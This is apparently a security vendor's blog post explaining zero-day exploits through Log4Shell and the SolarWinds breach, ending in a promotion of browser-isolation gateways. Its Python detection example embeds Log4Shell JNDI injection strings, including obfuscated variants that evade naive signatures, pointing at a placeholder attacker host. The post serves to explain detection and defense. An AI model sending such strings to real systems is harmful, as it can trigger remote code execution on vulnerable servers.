Eric Schwake | Jan 04, 2022
Zero-day exploits have been all over the news in recent years, and several foreign governments have been accused of enabling attacks on vulnerable network infrastructure in the U.S. and the European Union. Most recently, a critical zero-day (Log4Shell, CVE-2021-44228) was disclosed in Log4j, a widely used Java logging library maintained by the Apache Software Foundation. Because Log4j is open source and embedded, often as an indirect dependency, in countless Java applications and commercial products, the flaw likely affects millions of systems, many of whose owners did not know they were running it.
But what exactly is a zero-day exploit, how does it work, and should you be concerned? It’s time to answer those questions and share what you can do to protect your organization from these types of web threats.
A zero-day exploit is code or a technique that takes advantage of a vulnerability the vendor does not yet know about, and therefore has had zero days to fix, in software, firmware, an operating system, a web application, a website, or a Software as a Service (SaaS) platform. The exploit itself is only the entry point: it typically gives the attacker code execution on a device or service, which is then used to drop malware that delivers ransomware, destroys data, steals credentials, or spreads across the network in search of other vulnerable targets.
Let’s use the SolarWinds breach as an example. This major cybersecurity attack, attributed by the U.S. government to Russia’s foreign intelligence service (SVR), gave the attackers access to corporate and government systems and data in the U.S. and the European Union. Strictly speaking it was a software supply-chain compromise rather than the exploitation of a bug: the attackers compromised SolarWinds’ build process and inserted a backdoor (SUNBURST) into legitimate, signed updates for the company’s Orion platform, so every customer who installed the update also installed the backdoor. But it behaved like a zero-day in the way that matters to defenders, because no signature, patch, or threat-intelligence feed existed for it until it was discovered. Once inside, the attackers used their foothold to forge authentication tokens that gave them trusted, highly privileged access to networks and cloud services. High-profile victims included Microsoft, cybersecurity vendor FireEye (which discovered the intrusion), and several U.S. government agencies. Beyond the theft of data, the attack forced the roughly 18,000 SolarWinds customers who had downloaded the trojanized update to determine whether they had been breached, which for many meant taking systems offline and undergoing months-long remediation as a precaution.
Attackers invest enormous resources in reverse engineering popular technology products so they can find and exploit vulnerabilities in the code. Many of these groups are sponsored by foreign governments that provide protection and, in some cases, funding. A particularly attractive target is networking and management software that exposes remote administrative access to critical infrastructure, because a single flaw there opens many networks at once.
By definition, zero-day exploits are difficult to detect. The “zero” refers to the number of days the vendor has had to fix the flaw; if the vendor knew about it, it would simply patch it, and the exploit would stop being a zero-day. Most vendors rely on white hat researchers to find vulnerabilities in their software, report them privately, and allow time for a fix before anything is published (coordinated disclosure). Black hat hackers don’t operate under that code of ethics. If they find exploitable code, they keep it secret until they can profit, either by using the vulnerability themselves or by selling it on the black market. Because of this, legacy detect-and-respond security tools that depend on known intelligence, such as signatures, indicators of compromise, and reputation lists, are ill-suited to this type of attack. You can’t match a signature for something nobody has seen yet, and, as the Log4j case showed, even once a signature exists attackers quickly obfuscate the payload to slip past it.
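To make the “known intelligence” problem concrete, here is an added example (not code from the original post or from Menlo Security) in Python. It runs a naive Log4Shell signature over a handful of constructed web-server log lines and compares it with the same signature applied after evaluating Log4j’s lookup syntax, which is what attackers abused to hide the literal `jndi` once the first detections shipped. The log lines, the 203.0.113.0/24 addresses, and the assumption that no `NOTHING` environment variable exists on the logging host are all part of the example.

```python
import re

# Constructed sample web-server log lines (not real traffic). The first is
# benign; the rest carry a Log4Shell probe in the User-Agent field, first in
# plain form and then in three obfuscated forms attackers used once the
# first signatures shipped. 203.0.113.0/24 is a documentation range.
SAMPLE_LOGS = [
    '10.0.0.5 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${jndi:ldap://203.0.113.7:1389/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}dap://203.0.113.7/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.7/x}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${env:NOTHING:-j}ndi:dns://203.0.113.7/x}"',
]

# The signature most first-day detections used.
NAIVE_SIGNATURE = "${jndi:"

# An innermost Log4j lookup: "${...}" with no nested "${" inside it.
_INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")


def _evaluate_lookup(match):
    """Evaluate one innermost lookup the way vulnerable Log4j 2.x did, for
    the forms attackers used to hide the literal 'jndi'. Anything else is
    left untouched so the loop in normalize_lookups always terminates."""
    body = match.group(1)
    # "${prefix:name:-default}" yields the default when the lookup fails.
    # "${::-j}" and "${env:NOTHING:-j}" both evaluate to "j" (assumption:
    # no NOTHING environment variable is set, as on a typical server).
    if ":-" in body:
        return body.split(":-", 1)[1]
    prefix, sep, name = body.partition(":")
    if sep and prefix.lower() == "lower":
        return name.lower()
    if sep and prefix.lower() == "upper":
        return name.upper()
    return match.group(0)


def normalize_lookups(text, max_rounds=10):
    """Repeatedly evaluate innermost lookups until the text stops changing.
    Every evaluation strictly shortens the text, so this converges; the
    round cap is a guard against pathological input."""
    for _ in range(max_rounds):
        evaluated = _INNER_LOOKUP.sub(_evaluate_lookup, text)
        if evaluated == text:
            break
        text = evaluated
    return text


def naive_match(line):
    """What a signature built from the first public payload catches."""
    return NAIVE_SIGNATURE in line


def normalized_match(line):
    """Same signature, applied after evaluating the lookup syntax and
    lowercasing (Log4j lookup prefixes are case-insensitive)."""
    return NAIVE_SIGNATURE in normalize_lookups(line).lower()


def scan(lines):
    """Return (line_no, naive_hit, normalized_hit) for every line."""
    return [(i, naive_match(l), normalized_match(l)) for i, l in enumerate(lines)]


if __name__ == "__main__":
    for line_no, naive, normalized in scan(SAMPLE_LOGS):
        print(f"line {line_no}: naive={naive!s:5} normalized={normalized}")
```

The naive signature catches only the textbook payload; the normalizing version catches all four probes. That is the point of the passage above rather than a counter to it: a detection written from the first sample is already stale by the time it ships, and even the improved version only flags attempts after they have reached a vulnerable server. It does nothing to stop the exploit itself.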
What can you do about zero-days? Honestly, not much to stop the vulnerabilities from existing. It certainly helps to do business only with vendors you trust to keep their products secure, to apply vendor patches as soon as they ship, and to limit what any single compromised device or account can reach (least privilege, network segmentation, egress filtering) so that an exploit that does land has less to work with. But even the most hardened code has vulnerabilities. The most effective thing you can do is remove the attack path itself: keep untrusted web content from ever executing on your users’ devices. As the workforce continues to decentralize, it’s more critical than ever to protect your highly distributed infrastructure with a Secure Web Gateway (SWG) that includes web isolation technology.
A Secure Web Gateway, or SWG, powered by isolation technology has the standard controls for web traffic, such as blocking known bad sites and enforcing acceptable use policies. Isolation adds an abstraction layer in the cloud between your users and the Internet: code on websites, web apps, SaaS platforms, and other web content is fetched and executed in a remote browser in the cloud rather than on the endpoint, and only a safe rendering of the page is sent to the user’s device. Because the attacker’s code never runs in the local browser, a browser or plugin vulnerability on the endpoint, known or unknown, cannot be reached through web content. This shuts out web-delivered malware and ransomware without blocking legitimate content or hurting user productivity. One caveat to keep in mind: isolation covers the browser-delivered path. A zero-day in an Internet-facing server (as with Log4j) or a trojanized software update (as with SolarWinds) arrives by a different route and still calls for prompt patching, network controls, and monitoring.
Tagged with iSOC, Solarwinds, Vulnerabilities, Zero-Day